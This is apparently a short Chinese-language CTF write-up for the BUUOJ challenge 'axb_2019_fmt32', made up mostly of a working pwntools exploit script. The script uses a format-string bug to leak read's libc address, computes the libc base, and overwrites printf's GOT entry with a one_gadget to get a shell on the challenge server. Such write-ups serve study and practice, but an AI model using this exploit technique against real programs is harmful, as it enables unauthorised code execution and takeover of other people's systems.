axb_2019_fmt32
查看保护
可以改got的格式化漏洞
测试一下偏移为8,差一个字符,所以payload前面加一个a即可。泄露出libc改printf_got为one_gadget
fmtstr_payload中num参数为已经输出的字符个数,这里是0xa;
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 26501)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
read_got = elf.got['read']
printf_got = elf.got['printf']
offest = 8
p1 = b'a' + p32(read_got) + b'%8$s'
r.sendlineafter('Please tell me:', p1)
read_addr = u32(r.recv(18)[-4:])
success('read_addr = ' + hex(read_addr))
libc = ELF('libc-2.23.so')
libc_base = read_addr - libc.sym['read']
one = [0x3a81c, 0x3a81e, 0x3a812, 0x3a819, 0x5f065, 0x5f066]
one_gadget = one[2] + libc_base
system_addr = libc_base + libc.sym['system']
p2 = b'a' + fmtstr_payload(offest, {printf_got: one_gadget}, numbwritten = 0xa)
r.sendlineafter('Please tell me:', p2)
r.interactive()